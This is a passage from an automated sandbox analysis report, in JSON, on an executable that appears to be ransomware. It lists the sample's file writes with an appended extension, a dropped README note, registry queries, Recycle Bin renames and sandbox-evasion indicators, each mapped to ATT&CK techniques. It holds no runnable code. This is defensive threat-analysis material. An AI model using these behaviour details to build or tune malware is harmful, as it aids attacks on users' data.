\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeSFX.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ASPNETSetup_00001.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ASPNETSetup_00002.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrome_installer.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dd_vcredist_x86_20171203174931.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dd_vcredist_x86_20171203174931_000_vcRuntimeMinimum_x86.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\PrinterSetup.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_000_core_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_001_dev_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_002_exe_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_003_lib_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_004_test_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_005_doc_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_006_tools_JustForMe.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_007_tcltk_JustForMe.log.Uf0SZw0ws\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\wtsapi32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\wtsapi32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\RstrtMgr.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\RstrtMgr.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\ncrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\ncrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\bcrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"C:\\Windows\\system32\\bcrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to touch file \"\\Device\\KsecDD\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\winspool.drv\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe.Local\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\Uf0SZw0ws.README.txt\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\3FACC153ED82A72695EE2718084DB91F85E2560407899E1C7F6938FD4EA011E9.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\dotnet.au3.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\scite.session.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft at work.url.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft store.url.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\favorites\\links for united states\\gobiernousa.gov.url.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0ernyla.gif.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0n7wbcx6f.rar.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0nmjh6i8.gif.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0rer5x.txt.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\10ybabsxu.mp3.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1ezru.mp3.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1f5wjj2.gif.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1fdx8.pdf.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1ftajh.jpg.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1ove9n.rar.uf0szw0ws\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA\\ACCESSPROVIDERS\"; Key: \"MARTAEXTENSION\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILEBUFFEREDSYNCHRONOUSIO\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILECHUNKSIZE\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILEOVERLAPPEDCOUNT\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SQMCLIENT\\WINDOWS\\DISABLEDPROCESSES\"; Key: \"979D262E\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SQMCLIENT\\WINDOWS\\DISABLEDSESSIONS\"; Key: \"MACHINETHROTTLING\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SQMCLIENT\\WINDOWS\\DISABLEDSESSIONS\"; Key: \"GLOBALSESSION\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WBEM\\CIMOM\"; Key: \"LOGGING DIRECTORY\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WBEM\\CIMOM\"; Key: \"LOGGING\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WBEM\\CIMOM\"; Key: \"LOG FILE MAX SIZE\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Uf0SZw0ws.README.txt\" has type \"Unicode text UTF-8 text with CRLF LF line terminators\"- Location: [%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pythonwin\\pywin\\framework\\Uf0SZw0ws.README.txt]- [targetUID: 00000000-00004056]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA\\ACCESSPROVIDERS\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SQMCLIENT\\WINDOWS\\DISABLEDPROCESSES\\\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SQMCLIENT\\WINDOWS\\DISABLEDSESSIONS\\\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\PROGID\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\PROGID\"; Key: \"\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify sandbox environment running process\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Possibly tries to evade analysis by sleeping many times", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\desktop.ini\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original 